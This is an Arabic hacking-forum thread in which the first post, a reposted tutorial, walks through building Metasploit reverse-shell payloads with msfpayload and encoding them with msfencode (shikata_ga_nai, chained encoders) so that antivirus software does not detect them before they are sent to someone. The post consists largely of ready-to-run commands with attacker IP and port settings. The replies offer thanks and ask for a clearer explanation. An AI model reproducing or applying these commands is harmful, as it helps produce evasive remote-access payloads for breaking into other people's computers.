تشفير البايلود بالميتاسبلويت msfencode

تشفير البايلود بالميتاسبلويت msfencode


النتائج 1 إلى 6 من 6

الموضوع: تشفير البايلود بالميتاسبلويت msfencode

  1. #1

    افتراضي تشفير البايلود بالميتاسبلويت msfencode

    الصراحة الموضوع منقول و لكنه مهم جدآآ


    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاتة
    كيف صحتكم واوالكم وظروفك
    ان شاء الله رب العالمين تكونو بألف خير وصحة وسلامة وعافية
    اليوم درسنا يتكلم عن التشفير بالميتاسبلويت
    لنفرض انك انشأت بايلود بالـ msfpayload وفحصته او ارسلته لأحد اظن انه رح ينكشف من برنامج الحماية
    لكن درسنا اليوم رح يتم تشفير البايلود نهائي من اي حمايات
    نبدأ اول شيء
    نذهب لل CMD SHELL

    نكتب امر
    كود PHP:
    ruby msfencode -h
    اظهار تعليمات حول الادرة
    كود PHP:
    ruby msfencode -l
    يظهر انواع التشفيرات المتوفرة وقوت كل واحد
    واقوى واحدة وهي شيكاتا
    كود PHP:
    x86/shikata_ga_nai
    الآن نأتي لتعريف الاوامر لها والمهمة والرئيسية
    -e نوع التشفير يتبعها الاسم كـ
    كود PHP:
    -e x86/shikata_ga_nai
    -t صيغة التشفير يتبعها الصيغة
    والمتوافرة في الاداة هي 6 وهي
    raw, ruby, perl, c,exe, vba
    يكون الامر كـ
    كود PHP:
    -t perl
    -i لأستيراد بايلود صنعتة سابقا وتريد تشفيرة الآن
    يكون الامر هكذا
    كود PHP:
    -i C:server.exe
    او باللينكس يكون الامر متبوع بالاسم مباشرة هكذا
    كود PHP:
    -i server.exe
    او حسب المسار باللينكس
    الان عند التشفير يجب وضع -o لأخراج الملف للخارج اذا لم تريد ان يطبعه على شكل كود برمجي وفي وندوز سواء وضعته ام لا لن يفعل شيء
    لانك بآخر الكود رح تضع
    كود PHP:
    >"C:\"service.exe
    ويفضل وضعه

    لم نتطرق الى جميع الاوامر لكن في المستقبل القريب
    في الوقت هذه اللي تهمنا فقط ... باقي 5 اوامر غير مهمة كثيرا
    الآن نأتي للعملي
    نعرف في العادة ان صناعة اي بايلود يكون هكذا
    كود PHP:
    ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 X >"C:\"server.exe
    الآن هذا الامر واضح يقوم بصناعة بايلود لكن اذا ذهب وفحصته بأي موقع فحص او حماية جهازك ترى انه مكشوف
    الآن هو في المسار C:\
    الآن لنقم بتشفيره بالأمر
    كود PHP:
    ruby msfencode -e x86/shikata_ga_nai -i C:server.exe -t exe -o >"C:\"encoded.exe
    لنوضح الاوامر بدقة
    كود PHP:
    ruby msfencode
    لأستخدام الاداة (التشفير)
    كود PHP:
    -e x86/shikata_ga_nai
    وكما ذكرت لأستخدام النوع الذي تريد التشفير به اونا اخترت شيكاتا وهو اقوى واحد مشفر من جميع الحمايات عدى اثنين او ثلاثة وهي AVG و avast والثالث لم اذكر اسمه
    كود PHP:
    -i C:server.exe
    وايضا كما ذكرت لتشفير ملف تم انشائه سابقا متبوعا بالمسار واذا كان بداخل المجلد كما في اللنكس نضع فقط الاسم
    كود PHP:
    -t exe
    وايضا كما ذكرت سابقا لأختيار الصيغة وهنا صيغة exe ملف تنفيذي
    كود PHP:
    -o
    لاخراجة للخارج وعدم طباعته على الشاشة

    لنفرض انك تريد الشل بلغة بيرل او سي اي مطبوع على شاشة الدوس
    كود PHP:
    ruby msfencode -i C:server.exe -t c test.exe
    وسترى انه طبعه على شاشة الدوس بتشفير شيكاتا
    ييجي واحد ويقول ليش ما اخترنا نوع التشفير
    اقوله لأن الاداة تختار التشفير شيكاتا تلقائي
    الآن نقدر نسوي كل هذا من صنع بايلود وتشفيره على سطر واحد ونسمي الملف بالأخر
    انظروا كيف..
    كود PHP:
    ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.137 LPORT=4444 X | ruby msfencode -e x86/shikata_ga_nai -t exe >"C:\"finish.exe
    اول امر وهو صناعة بايلود لكن دون وضع اسم ومكان الحفظ فقط وضعنا الصيغة exe اختصار لـ X وفصلناه مع الأمر الآخر برمز | ثم كتبنا الامر التالي وهو واضح اختيار التشفير شيكاتا والصيغة ومكان الحفظ

    ويوجد ايضا التشفير بأكثر من نوع
    كود PHP:
    ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.15 LPORT=4444 | ruby msfencode -e x86/shikata_ga_nai -t raw -c 5 | ruby msfencode -e cmd/generic_sh -t raw -c 5 | ruby msfencode -e x86/countdown -t perl >"C:\"3encoders.exe
    كل شيء واضح عدا -t raw -c 5 اي انه يجمع الصيغة وبالىخر يتم اختيارها
    الآن افحص الملف وستجده انه غير مكشوف من اي حماية
    هذا هو درسنا
    وان شاء الله استفدتوا
    واللي مو فاهم يقول لي وانا بالخدمة
    ولشباب اللينكس فقط التغييرات بسيطة مجرد من ruby الى ./ و المسار C الى اسم فقط او مسار تفضله وبأمكانك وضع اسم الملف فقط وستجده داخل مجلد اداة الميتاسبلويت
    مع تحياتي
    لا للاحتكار
    المجهوول




  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: تشفير البايلود بالميتاسبلويت msfencode

    تحياتى الخاصة لك على مجهودك الرائع ...

    استمر واحنا كلنا هنتآبع شروحاتك ...

    بآلتوفيق والنجاح ان شاء الله


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3

    افتراضي رد: تشفير البايلود بالميتاسبلويت msfencode

    مشكور اخي بارك الله فيك

  4. #4
    هكر مجتهد الصورة الرمزية MASTER-HACK
    تاريخ التسجيل
    Dec 2011
    الدولة
    مــصر ام الدنيا
    المشاركات
    209

    افتراضي رد: تشفير البايلود بالميتاسبلويت msfencode

    بصراحة انا فاهم 30% من كلامك لاني اول مرة اسمعه

    اما عن صنع بايلود فهو مثل سيرفر البيفروست اعتقد ~

    بصناعة البايلود يكون مكشوف وانا لازم نشفره

    والدرس عن التشفير وانا فاهم 30% بس ~

    لان الكلام الي تكتبه يكون غير مرتب لان الانجليزي والعربي غير متجانسا في نفس السطر مثلاً : Cmdوبعدين نكتب هذا الامر .

    اي يكون الكلام غير مرتب فهمت قصدي كما في المثال .

    وارجو منك إعادة شرح الاوامر مثلاً :

    الامر

    cmd

    يعمل كذا كذا كذا

    يكون الكلام الانجليزي في سطر عشان الكلام ما يلخبط معك

    لو ما فيها ازعاج طبعاً

    وشكراً على الشرح الرائع

  5. #5

    افتراضي رد: تشفير البايلود بالميتاسبلويت msfencode

    مشكوووووووووووووووووووووو وور

  6. #6

    افتراضي رد: تشفير البايلود بالميتاسبلويت msfencode

    thanxxxxxx for you

المواضيع المتشابهه

  1. فيديو شرح إختراق بالميتاسبلويت وبدون ارسال أي شيئ للضحية
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 111
    آخر مشاركة: 12-08-2011, 04:38 PM
  2. فيديو شرح إختراق بالميتاسبلويت وبدون ارسال أي شيئ للضحية
    بواسطة زاحف بس ناحف في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 360
    آخر مشاركة: 09-23-2011, 11:20 PM
  3. برنامج تشفير xdz-CrypT3r
    بواسطة Shibani في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 12
    آخر مشاركة: 12-27-2010, 01:12 AM
  4. برنامج تشفير 5 في 1
    بواسطة alaa spider في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 2
    آخر مشاركة: 06-23-2010, 11:13 AM
  5. مشاركات: 2
    آخر مشاركة: 10-30-2009, 12:45 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •